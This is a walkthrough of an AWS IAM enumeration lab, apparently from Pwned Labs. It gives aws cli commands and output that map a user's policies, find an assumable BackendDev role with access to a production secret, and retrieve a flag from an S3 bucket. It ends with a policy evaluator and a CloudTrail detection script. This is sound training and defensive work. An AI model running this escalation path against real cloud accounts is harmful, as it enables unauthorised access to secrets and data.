AWS IAM Enumeration - Lab Walkthrough #
Overview #
This lab demonstrates systematic AWS Identity and Access Management (IAM) enumeration techniques to discover user permissions, policies, and potential privilege escalation paths.
Learning Objectives:
- Master AWS IAM enumeration methodologies
- Understand the difference between managed and inline policies
- Learn to analyze policy permissions and identify privilege escalation opportunities
- Practice systematic credential and resource discovery
Lab Source: Pwned Labs - Intro to AWS IAM Enumeration
Phase 1: Initial Identity Discovery #
Current User Identification #
First, let’s identify the current AWS identity and permissions:
aws sts get-caller-identity
Result:
{
"UserId": "AIDA3SFMDAPOWFB7BSGME",
"Account": "794929857501",
"Arn": "arn:aws:iam::794929857501:user/dev01"
}
Identity Confirmed: Operating as IAM user dev01 in AWS account 794929857501
Detailed User Information #
Let’s gather more detailed information about this user:
aws iam get-user
User Details:
{
"User": {
"Path": "/",
"UserName": "dev01",
"UserId": "AIDA3SFMDAPOWFB7BSGME",
"Arn": "arn:aws:iam::794929857501:user/dev01",
"CreateDate": "2023-09-28T21:56:31+00:00",
"PasswordLastUsed": "2025-09-05T18:46:08+00:00",
"Tags": [
{
"Key": "AKIA3SFMDAPOWC2NR5LO",
"Value": "dev01"
}
]
}
}
Key Observations:
- User created on September 28, 2023
- Recently used (password last used on September 5, 2025)
- Tagged with what appears to be an AWS Access Key ID
Phase 2: Group Membership Analysis #
Checking Group Associations #
Users can inherit permissions from groups, so let’s check group memberships:
aws iam list-groups-for-user --user-name dev01
Result:
{
"Groups": []
}
Finding: The user is not a member of any IAM groups, so permissions must be directly attached via policies.
Phase 3: Policy Enumeration #
Managed Policies Analysis #
Let’s identify managed policies attached to the user:
aws iam list-attached-user-policies --user-name dev01
Managed Policies Discovered:
{
"AttachedPolicies": [
{
"PolicyName": "AmazonGuardDutyReadOnlyAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess"
},
{
"PolicyName": "dev01",
"PolicyArn": "arn:aws:iam::794929857501:policy/dev01"
}
]
}
Policy Analysis:
- AmazonGuardDutyReadOnlyAccess - AWS-managed policy providing read-only access to Amazon GuardDuty
- dev01 - Customer-managed policy specifically created for this user
Inline Policies Discovery #
Inline policies are embedded directly into users, groups, or roles and require separate enumeration:
aws iam list-user-policies --user-name dev01
Inline Policies Discovered:
{
"PolicyNames": [
"cloudshell",
"S3_Access"
]
}
Policy Analysis:
- cloudshell - Likely grants access to AWS CloudShell service
- S3_Access - Provides access to specific Amazon S3 resources
Total Policy Count: 4 policies require detailed analysis (2 managed + 2 inline)
Phase 4: Detailed Policy Analysis #
AWS Managed Policy: AmazonGuardDutyReadOnlyAccess #
Check the policy's versions (note: inline policies don't support versioning):
aws iam list-policy-versions --policy-arn arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess
Version History:
{
"Versions": [
{
"VersionId": "v4",
"IsDefaultVersion": true,
"CreateDate": "2023-11-16T23:07:06+00:00"
},
{
"VersionId": "v3",
"IsDefaultVersion": false,
"CreateDate": "2021-02-16T23:37:57+00:00"
},
{
"VersionId": "v2",
"IsDefaultVersion": false,
"CreateDate": "2018-04-25T21:07:17+00:00"
},
{
"VersionId": "v1",
"IsDefaultVersion": false,
"CreateDate": "2017-11-28T22:29:40+00:00"
}
]
}
Active Version: v4 (current default version)
Get policy document for active version:
aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess --version-id v4
Policy Document:
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"guardduty:Describe*",
"guardduty:Get*",
"guardduty:List*"
],
"Resource": "*"
},
{
"Effect": "Allow",
"Action": [
"organizations:ListDelegatedAdministrators",
"organizations:ListAWSServiceAccessForOrganization",
"organizations:DescribeOrganizationalUnit",
"organizations:DescribeAccount",
"organizations:DescribeOrganization",
"organizations:ListAccounts"
],
"Resource": "*"
}
]
},
"VersionId": "v4",
"IsDefaultVersion": true,
"CreateDate": "2023-11-16T23:07:06+00:00"
}
}
Security Assessment: This policy provides read-only access to GuardDuty and Organizations services. While informational, it doesn’t grant significant privileges for escalation.
Customer Managed Policy: dev01 #
Analyze the custom dev01 policy:
aws iam list-policy-versions --policy-arn arn:aws:iam::794929857501:policy/dev01
Version History:
{
"Versions": [
{
"VersionId": "v7",
"IsDefaultVersion": true,
"CreateDate": "2023-10-11T19:59:08+00:00"
},
{
"VersionId": "v6",
"IsDefaultVersion": false,
"CreateDate": "2023-10-11T19:47:41+00:00"
},
{
"VersionId": "v5",
"IsDefaultVersion": false,
"CreateDate": "2023-10-07T22:48:28+00:00"
},
{
"VersionId": "v4",
"IsDefaultVersion": false,
"CreateDate": "2023-10-02T20:38:35+00:00"
},
{
"VersionId": "v3",
"IsDefaultVersion": false,
"CreateDate": "2023-10-02T20:29:52+00:00"
}
]
}
Active Version: v7 (multiple revisions suggest active development)
Get policy document for v7:
aws iam get-policy-version --policy-arn arn:aws:iam::794929857501:policy/dev01 --version-id v7
Policy Document:
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"iam:GetRole",
"iam:GetPolicyVersion",
"iam:GetPolicy",
"iam:ListPolicyVersions",
"iam:GetUserPolicy",
"iam:ListGroupsForUser",
"iam:ListAttachedUserPolicies",
"iam:ListUserPolicies",
"iam:GetUser",
"iam:ListAttachedRolePolicies",
"iam:GetRolePolicy"
],
"Resource": [
"arn:aws:iam::794929857501:user/dev01",
"arn:aws:iam::794929857501:role/BackendDev",
"arn:aws:iam::794929857501:policy/BackendDevPolicy",
"arn:aws:iam::794929857501:policy/dev01",
"arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess"
]
}
]
},
"VersionId": "v7",
"IsDefaultVersion": true,
"CreateDate": "2023-11-16T19:59:08+00:00"
}
}
Critical Discovery: This policy grants extensive IAM read permissions, including the ability to inspect roles and policies. Most importantly, it names a BackendDev role and a BackendDevPolicy in its resource list, both potential privilege escalation targets!
Phase 5: Role Discovery and Analysis #
BackendDev Role Investigation #
Enumerate policies attached to the BackendDev role:
aws iam list-attached-role-policies --role-name BackendDev
Result:
{
"AttachedPolicies": [
{
"PolicyName": "BackendDevPolicy",
"PolicyArn": "arn:aws:iam::794929857501:policy/BackendDevPolicy"
}
]
}
Finding: The BackendDev role has the BackendDevPolicy attached. This creates a potential privilege escalation pathway.
Role Trust Policy Analysis #
Examine the BackendDev role details:
aws iam get-role --role-name BackendDev
Role Configuration:
{
"Role": {
"Path": "/",
"RoleName": "BackendDev",
"RoleId": "AROA3SFMDAPO2RZ36QVN6",
"Arn": "arn:aws:iam::794929857501:role/BackendDev",
"CreateDate": "2023-09-29T12:30:29+00:00",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::794929857501:user/dev01"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Grant permissions to backend developers",
"MaxSessionDuration": 3600,
"RoleLastUsed": {
"LastUsedDate": "2025-09-05T21:59:04+00:00",
"Region": "us-east-1"
}
}
}
Critical Finding: The trust policy explicitly allows our current user (dev01) to assume this role! This is a clear privilege escalation opportunity.
BackendDevPolicy Analysis #
Get policy metadata:
aws iam get-policy --policy-arn arn:aws:iam::794929857501:policy/BackendDevPolicy
Policy Metadata:
{
"Policy": {
"PolicyName": "BackendDevPolicy",
"PolicyId": "ANPA3SFMDAPO7OINIQIRR",
"Arn": "arn:aws:iam::794929857501:policy/BackendDevPolicy",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"Description": "Policy defining permissions for backend developers",
"CreateDate": "2023-09-29T12:44:09+00:00",
"UpdateDate": "2023-09-29T12:44:09+00:00",
"Tags": []
}
}
Get the policy document for version v1:
aws iam get-policy-version --policy-arn arn:aws:iam::794929857501:policy/BackendDevPolicy --version-id v1
BackendDevPolicy Document:
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"ec2:DescribeInstances",
"secretsmanager:ListSecrets"
],
"Resource": "*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": [
"secretsmanager:GetSecretValue",
"secretsmanager:DescribeSecret"
],
"Resource": "arn:aws:secretsmanager:us-east-1:794929857501:secret:prod/Customers-QUhpZf"
}
]
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2023-09-29T12:44:09+00:00"
}
}
Key Discovery: This policy grants access to AWS Secrets Manager, including the ability to retrieve a specific secret: prod/Customers-QUhpZf. This could contain sensitive credentials or database connection strings!
Phase 6: Inline Policy Analysis #
S3_Access Policy Investigation #
Analyze the S3_Access inline policy:
aws iam get-user-policy --user-name dev01 --policy-name S3_Access
S3_Access Policy Document:
{
"UserName": "dev01",
"PolicyName": "S3_Access",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:ListBucket",
"s3:GetObject"
],
"Resource": [
"arn:aws:s3:::hl-dev-artifacts",
"arn:aws:s3:::hl-dev-artifacts/*"
]
}
]
}
}
Discovery: This policy grants read access to the hl-dev-artifacts S3 bucket. This could contain the lab flag!
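The policy documents gathered in Phases 4 to 6 can be checked programmatically instead of by eye. The following Python is an added example, not part of the lab: a deliberately small evaluator that reproduces IAM's explicit-deny / allow / implicit-deny ordering and wildcard matching, run over trimmed copies of the dev01 and BackendDevPolicy documents shown above; the role/Other ARN is a hypothetical resource included to show a miss.

```python
"""Minimal IAM policy evaluator for reviewing the documents collected above.
Explicit Deny wins, any matching Allow grants, otherwise implicit deny.
Conditions, NotAction/NotResource, boundaries and SCPs are not modelled."""
import re

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _match(pattern, value, ignore_case=False):
    # IAM patterns use '*' (and '?', unused in this lab); everything else is literal.
    regex = "^" + ".*".join(re.escape(p) for p in pattern.split("*")) + "$"
    return re.match(regex, value, re.IGNORECASE if ignore_case else 0) is not None

def is_allowed(policies, action, resource):
    """True if the combined policy documents allow `action` on `resource`."""
    allowed = False
    for doc in policies:
        for stmt in _as_list(doc["Statement"]):
            # Action names are case-insensitive; resource ARNs are not.
            if not any(_match(a, action, True) for a in _as_list(stmt.get("Action", []))):
                continue
            if not any(_match(r, resource) for r in _as_list(stmt.get("Resource", []))):
                continue
            if stmt["Effect"] == "Deny":
                return False
            allowed = True
    return allowed

# Trimmed copies of the dev01 and BackendDevPolicy documents from the lab output.
SECRET = "arn:aws:secretsmanager:us-east-1:794929857501:secret:prod/Customers-QUhpZf"
DEV01 = {"Statement": [{"Effect": "Allow",
    "Action": ["iam:GetRole", "iam:GetPolicyVersion", "iam:ListAttachedRolePolicies"],
    "Resource": ["arn:aws:iam::794929857501:user/dev01",
                 "arn:aws:iam::794929857501:role/BackendDev",
                 "arn:aws:iam::794929857501:policy/BackendDevPolicy"]}]}
BACKEND_DEV = {"Statement": [
    {"Effect": "Allow", "Action": ["ec2:DescribeInstances", "secretsmanager:ListSecrets"],
     "Resource": "*"},
    {"Effect": "Allow", "Action": ["secretsmanager:GetSecretValue", "secretsmanager:DescribeSecret"],
     "Resource": SECRET}]}
CHECKS = [("iam:GetRole", "arn:aws:iam::794929857501:role/BackendDev"),
          ("iam:GetRole", "arn:aws:iam::794929857501:role/Other"),  # hypothetical, not in the lab
          ("secretsmanager:GetSecretValue", SECRET)]

if __name__ == "__main__":
    for label, policy in (("dev01", DEV01), ("BackendDev", BACKEND_DEV)):
        print(label, [c for c in CHECKS if is_allowed([policy], *c)])
```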
Phase 7: Resource Enumeration and Flag Discovery #
S3 Bucket Investigation #
List contents of the hl-dev-artifacts bucket:
aws s3 ls s3://hl-dev-artifacts
Bucket Contents:
2023-10-01 20:39:53 1235 android-kotlin-extensions-tooling-232.9921.47.pom
2023-10-01 20:39:53 214036 android-project-system-gradle-models-232.9921.47-sources.jar
2023-10-01 20:38:05 32 flag.txt
Target Acquired: The flag.txt file is present in the bucket!
Download the flag:
aws s3 cp s3://hl-dev-artifacts/flag.txt .
Flag Retrieved:
xyz123
Mission Accomplished!
Key Takeaways #
Attack Chain Summary #
- Initial Enumeration: Started with basic identity discovery using aws sts get-caller-identity
- Permission Mapping: Systematically enumerated all attached and inline policies
- Policy Analysis: Analyzed policy documents to understand granted permissions
- Privilege Discovery: Identified assumable role with expanded permissions
- Resource Access: Located and accessed S3 bucket containing the flag
IAM Enumeration Methodology #
- Identity Discovery: Who am I? (aws sts get-caller-identity)
- User Details: What are my attributes? (aws iam get-user)
- Group Membership: What groups provide inherited permissions?
- Managed Policies: What AWS and customer-managed policies are attached?
- Inline Policies: What embedded policies exist?
- Policy Analysis: What specific permissions do these policies grant?
- Role Discovery: What roles can I assume for privilege escalation?
- Resource Enumeration: What resources can I access with current permissions?
Security Lessons #
- Principle of Least Privilege: The dev01 user had more permissions than necessary
- Policy Versioning: Multiple policy versions can indicate ongoing changes and potential misconfigurations
- Role Assumption: Trust policies should be carefully reviewed to prevent unintended privilege escalation
- Resource-Based Access: S3 bucket policies and inline policies can provide unexpected access paths
- Enumeration Detection: These activities generate CloudTrail logs and should be monitored
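To make the last lesson concrete, this added example (not part of the lab) shows detection logic a defender could run over CloudTrail records: it groups events by calling identity, flags a burst of distinct IAM read APIs within a short window, and reports any AssumeRole by the same principal after the burst began. The SAMPLE records are constructed to mirror this walkthrough's command sequence, and the window and threshold are assumptions to tune.

```python
"""Flag the IAM enumeration pattern from this lab in CloudTrail records.
The SAMPLE events are constructed to mirror the lab's command sequence; they
are not real CloudTrail output. Records are assumed already parsed from JSON."""
from collections import defaultdict
from datetime import datetime, timedelta

# IAM/STS read-only calls that, bursted by one principal, look like enumeration.
RECON_EVENTS = {"GetCallerIdentity", "GetUser", "ListGroupsForUser", "ListAttachedUserPolicies",
                "ListUserPolicies", "ListPolicyVersions", "GetPolicyVersion", "GetRole", "GetUserPolicy"}

def _ts(rec):
    return datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def detect(records, window=timedelta(minutes=10), threshold=5):
    """Return (principal_arn, reason) alerts: a burst of distinct IAM read APIs
    within `window`, and any AssumeRole by that principal after the burst began."""
    by_arn = defaultdict(list)
    for rec in sorted(records, key=_ts):
        by_arn[rec["userIdentity"]["arn"]].append(rec)
    alerts = []
    for arn, recs in by_arn.items():
        recon = [r for r in recs if r["eventName"] in RECON_EVENTS]
        for i, first in enumerate(recon):   # sliding window over the recon calls
            names = {r["eventName"] for r in recon[i:] if _ts(r) - _ts(first) <= window}
            if len(names) >= threshold:
                alerts.append((arn, f"{len(names)} distinct IAM read APIs within {window}"))
                break
        else:
            continue   # no burst for this principal, so a lone AssumeRole is not flagged
        for r in recs:
            if r["eventName"] == "AssumeRole" and _ts(r) > _ts(recon[0]):
                alerts.append((arn, "AssumeRole to " + r["requestParameters"]["roleArn"]))
    return alerts

def _ev(time, name, arn, **params):   # builder for the constructed sample records
    return {"eventTime": time, "eventName": name, "userIdentity": {"arn": arn},
            "requestParameters": params}

DEV01 = "arn:aws:iam::794929857501:user/dev01"
SAMPLE = [_ev("2025-09-05T18:50:00Z", "GetCallerIdentity", DEV01),
          _ev("2025-09-05T18:50:20Z", "GetUser", DEV01, userName="dev01"),
          _ev("2025-09-05T18:50:40Z", "ListAttachedUserPolicies", DEV01, userName="dev01"),
          _ev("2025-09-05T18:51:00Z", "ListUserPolicies", DEV01, userName="dev01"),
          _ev("2025-09-05T18:52:00Z", "GetPolicyVersion", DEV01, policyArn="arn:aws:iam::794929857501:policy/dev01"),
          _ev("2025-09-05T18:53:00Z", "GetRole", DEV01, roleName="BackendDev"),
          _ev("2025-09-05T18:55:00Z", "AssumeRole", DEV01, roleArn="arn:aws:iam::794929857501:role/BackendDev")]

if __name__ == "__main__":
    for arn, reason in detect(SAMPLE):
        print(arn, "->", reason)
```

In practice the records would come from a CloudTrail Lake or Athena query rather than an inline list; the eventName values used here are the CloudTrail names of the API calls this walkthrough makes.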